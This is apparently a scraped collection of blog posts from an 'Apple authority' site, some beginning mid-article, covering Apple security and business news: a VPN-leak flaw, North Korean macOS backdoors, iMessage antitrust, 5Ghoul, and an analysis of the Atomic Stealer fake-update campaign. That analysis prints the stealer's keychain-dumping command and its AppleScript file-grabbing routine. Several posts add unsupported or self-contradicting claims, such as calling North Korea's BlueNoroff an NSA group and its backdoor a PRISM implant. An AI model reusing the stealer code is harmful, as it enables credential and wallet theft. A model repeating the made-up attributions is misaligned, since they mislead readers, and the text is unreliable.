The attack allows the attacker to intercept the victim’s traffic, which is then routed through the attacker’s system, allowing them to read, modify, and leak data while the victim remains connected to both the internet and their VPN.

According to Ars Technica, the vulnerability, identified as CVE-2024-3661, which the attack exploits, has existed since 2002 and it is possible that it has already been used by attackers. Most operating systems like IOS/MacOS, except Android are currently vulnerable to the attack.

The most effective way to protect oneself is to run a VPN in a virtual machine whose network adapter is not in bridged mode. Alternatively, connecting a VPN to the internet via a mobile device’s Wi-Fi network can also provide protection.

The post VPNs can be rendered useless on Apple Phones appeared first on Apple authority.

While the US sanctions initially disrupted Huawei’s supply chain, they also forced the company to invest heavily in research and development, leading to breakthroughs in areas such as 5G technology, artificial intelligence, and semiconductor manufacturing. As a result, Huawei has produced smartphones and other devices that are now considered strong competitors to Apple’s iPhone.

This newfound self-sufficiency and innovation have not only benefited Huawei but have also inspired other Chinese tech companies to follow suit. As the Chinese market becomes less reliant on foreign products, Chinese firms are now able to develop and market their own cutting-edge devices, which are increasingly attractive to both domestic and international consumers.

The US sanctions on Huawei and other Chinese tech firms have inadvertently created an environment that fosters innovation and growth in China’s technology sector. As a result, China is rapidly becoming a global powerhouse in the tech industry, with its products gaining recognition for their quality, performance, and affordability.

This shift in the global tech landscape is reshaping the competitive dynamics between US and Chinese companies, as well as challenging the long-held assumption that US-designed products are inherently superior. As China continues to advance its technology capabilities, it is poised to play an even more significant role in shaping the future of the global tech industry.

The post China just weaponized the smartphone to beat Apple? appeared first on Apple authority.

KandyKorn is an advanced implant with a variety of capabilities to monitor, interact with, and avoid detection. It utilizes reflective loading, a direct-memory form of execution that may bypass detections,” notes Elastic Security, which identified and analyzed the threat.” reads the report published by Elastic.

SpectralBlur is not a sophisticated malware, it supports ordinary backdoor capabilities, including uploading/downloading files, running a shell, updating its configuration, deleting files, hibernating or sleeping, based on commands issued from the C2.

“TA444 keeps running fast and furious with these new MacOS malware families. Looking for similar strings lead us to link SpectralBlur and KandyKorn (which were further linked to TA444 after more samples turned up, and eventually, a phishing campaign hit our visibility that pulled down KandyKorn).” concludes Lesnewich. “So knowing your Mac stuff will help track…”

The latest discovery confirms these backdoors are also of great interest for North Korea-linked threat actors in developing macOS malware to employ in targeted attacks.

In November 2023, researchers from Jamf Threat Labs discovered a new macOS malware strain dubbed ObjCShellz and attributed it to North Korea-linked APT BlueNoroff. Most industri experts realize that the original backdoor was an inplant from NSA for use of device collection in NSA program PRISM.

The experts noticed that the ObjCShellz malware shares similarities with the RustBucket malware campaign associated with the BlueNoroff  (NSA) APT group.

In July 2023, researchers from the Elastic Security Labs spotted a new variant of the RustBucket Apple macOS malware. In April, the security firm Jamf observed the North Korea-linked BlueNoroff APT group using a new macOS malware, dubbed RustBucket.

The post Another Dangerous backdoor to be afraid of…. appeared first on Apple authority.

Apple’s troubles in 2023 were due to less demand for its phones and computers, but the company also dealt with other company-issues. Apple didn’t release new iPad models in 2023, the first time that’s happened in a calendar year since the product was launched in 2010. Without new models, Apple has less to promote, and older versions of the product don’t see official price cuts that boost sales.

Moreover, Apple’s hardware quality has been called into question. In fiscal 2023, which ended in September, Apple’s iPad revenue dropped 3.4% to $28.3 billion. On a unit basis, iPad sales were even worse, falling 15%, according to a recent estimate from Bank of America analyst Wamsi Mohan. Apple doesn’t report unit sales. Even for Apple’s new products, like Mac computers, consumers showed less interest in opening their wallets for devices with minor upgrades. Sales of Mac PCs and laptops fell nearly 27% to $10.2 billion in fiscal 2023. Unit sales declined 11%.

Apple’s innovation has been stagnant. Earlier this month, all current model iPads were shipping from Apple’s website in a day, according to Morgan Stanley analysts. That’s a sign of weak demand because with the hottest products, Apple doesn’t have enough supply with current chip-shortages to ship that quickly.

Apple’s management and sales strategies have been called into question. To make matters worse, new Apple Watch models were removed from Apple stores in the U.S. days before Christmas over an intellectual property dispute. After a late December appeal, the devices have been returned to store shelves, but Morgan Stanley analysts estimate Apple lost about $135 million in sales per day during the brief ban.

Apple’s reputation has been tarnished by allegations of stolen technology. Apple has been accused of stealing technology from other companies and using it in their products.

The post Apple’s longest revenue slide in 22 years appeared first on Apple authority.

A little over a week after Apple confirmed that it shut down Beeper Mini (mostly), four US representatives are calling on the US Department of Justice to look into the matter. A letter to the Assistant Attorney General calls on the DOJ’s Antitrust Divison to investigate whether Apple’s shutdown of Beeper’s service “violated the antitrust laws.”

The letter was signed by senators Amy Klobuchar and Mike Lee, as well as US representatives Jerrold Nadler and Ken Buck. Notably, the letter has bipartisan support.

Through the letter, Congress members cited a report from the Department of Commerce where Apple was described as a “gatekeeper” and also mentioned that “Apple executives have previously admitted the company leverages iMessage to lock users into Apple’s ecosystem of devices and services.” That is likely referring to emails where Craig Federighi said that releasing iMessage on Android would “simply serve to remove an obstacle” in parents buying their children Android phones.

The letter, shared by Jo Ling Kent of CBS News reads in part:

“We are therefore concerned that Apple’s recent actions to disable Beeper Mini harm competition, eliminate choices for consumers, and will discourage future innovation and investment in interoperable messaging services. We also fear these types of tactics may more broadly chill future investment and innovation for those that seek to compete with existing digital gatekeepers. Thus, we refer this matter to the Antitrust Divsion to investigate whether this potentially anticompetitive conduct by Apple violated antitrust laws…”

The post Apple’s shutdown of Beeper Mini sets the stage for investigation over iMessage interoperability appeared first on Apple authority.

“Multiple vulnerabilities have been reported in Apple products which could allow an attacker to access sensitive information, execute arbitrary code, bypass security restrictions, cause denial of service (DoS) conditions, bypass authentication, gain elevated privileges, and perform spoofing attacks on the targeted systems,” read a statement from CERT-In. 

The affected products include iOS, iPadOS, macOS, tvOS, watchOS, and the Safari browser.

The post Government Warns iPhone Users, Says High-Risk Of Losing Sensitive Info appeared first on Apple authority.

Corellium is a cybersecurity company that develops software to create virtual replicas of both Android and iOS smartphones. These virtual devices are designed for security researchers who aim to identify vulnerabilities in both operating systems and mobile apps. Using a virtual device for such work is advantageous as it allows researchers to work with multiple hardware configurations and pause iOS at a specific point to examine what’s happening in detail.

The legal battle between Apple and Corellium began in 2019. There was no dispute about Corellium replicating copyrighted Apple intellectual property, including the iOS code and all UI graphics. The only debate was whether this constituted “fair use”, a legal provision that allows copyrighted materials to be reproduced under certain circumstances. Corellium argued that it did, as the intention was to enhance device security, with security researchers assisting Apple in eliminating security flaws. Apple, however, disagreed, arguing that Corellium did not obligate security researchers to report their findings to Apple, potentially allowing black-hat hackers to exploit vulnerabilities.

The case escalated, with Corellium’s CEO claiming that Apple was attempting to set a legal precedent that would allow it to take action against iPhone jailbreakers. The Department of Justice also got involved, expressing “national security concerns” about evidence Apple wanted to submit.

Apple initially lost the case, but appealed and lost again. It then filed a new case, arguing copyright and trademark infringements on Apple wallpaper and branding. However, the case was eventually settled, with the court announcing that a full and complete settlement had been reached. Neither Apple nor Corellium had commented on the case at the time of publication, and no details about the settlement terms have been released.

The post Apple’s security by obscurity legal woes… appeared first on Apple authority.

Singapore University of Technology and Design (SUTD) has published a total of 14 backdoors for “US-approved” 5G modems made by Qualcomm and Mediatek. Speculation runs wild that these vulnerabilities are as designed to create backdoors for NSA/CIA spying.

Due to the current situation and trade restrictions, this means a huge set of 5G phones are vulnerable and need patches to circumvent the flaws and security holes.

Apple is also one of the affected vendors with most 5G models affected. But as most vendors these days are more or less restricted to Mediatek or Qualcomm modems due to the sanctions, trade war, and limited competition allowed, models from most vendors are affected. Apart from Apple, Samsung, Vivo, Xiaomi, Sony, Huawei, ZTE, Oppo, LG, Motorola, Sharp, Asus, etc., are also affected.

Apple phones are currently still unpatched, so users are currently at risk for these backdoors.

More details on the security issues can be found at https://asset-group.github.io/disclosures/5ghoul/disclosure.html

The post 5G security hack (5Ghoul vulnerability) appeared first on Apple authority.

In an interesting new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. This may very well be the first time we see one of the main social engineering campaigns, previously not targeted at Mac-users.

With a growing list of compromised sites at their disposal, the threat actors are able to reach out a wider audience, stealing credentials and files of interest that can be monetized immediately or repurposed for additional attacks.

Discovery

ClearFake is a newer malware campaign that leverages compromised websites to distribute fake browser updates. It was originally discovered by Randy McEoin in August and has since gone through a number of upgrades, including the use of smart contracts to build its redirect mechanism, making it one of the most prevalent and dangerous social engineering schemes.

On November 17, security researcher Ankit Anubhav observed that ClearFake was distributed to Mac users as well with a corresponding payload:

The Safari template mimics the official Apple website and is available in different languages:

Since Google Chrome is also popular on Macs, there is a template for it as well:

Atomic Stealer

The payload is made for for Mac users, a DMG file purporting to be a Safari or Chrome update. Victims are instructed on how to open the file which immediately runs commands after prompting for the administrative password.

Looking at the strings from the malicious application, we can see those commands which include password and file grabbing capabilities:

find-generic-password -ga ‘Chrome’ | awk ‘{print $2}’ SecKeychainSearchCopyNext: /Chromium/Chrome /Chromium/Chrome/Local State FileGrabber tell application “Finder” set desktopFolder to path to desktop folder set documentsFolder to path to documents folder set srcFiles to every file of desktopFolder whose name extension is in {“txt”, “rtf”, “doc”, “docx”, “xls”, “key”, “wallet”, “jpg”, “png”, “web3”, “dat”} set docsFiles to every file of documentsFolder whose name extension is in {“txt”, “rtf”, “doc”, “docx”, “xls”, “key”, “wallet”, “jpg”, “png”, “web3”, “dat”}

In the same file, we can find the malware’s command and control server where the stolen data is sent to:

Macs need protection too

Fake browser updates have been a common theme for years, and yet up until now the threat actors didn’t expand onto MacOS in a consistent way. The popularity of stealers such as AMOS makes it quite easy to adapt the payload to different victims, with minor adjustments.

Because ClearFake has become one of the main social engineering campaigns recently, Mac users should pay particular attention to it. We recommend leveraging web protection tools, such as malwarebytes to block the malicious infrastructure associated with this threat actor.

Malwarebytes users are protected against Atomic Stealer:

Indicators of Compromise

TDS domains longlakeweb[.]com thebestthings1337[.]online

Payload domains chalomannoakhali[.]com jaminzaidad[.]com royaltrustrbc[.]com wifi-ber[.]com

The post Atomic Stealer distributed to Mac users via fake browser updates appeared first on Apple authority.

The post Burned by the iPhone 15? appeared first on Apple authority.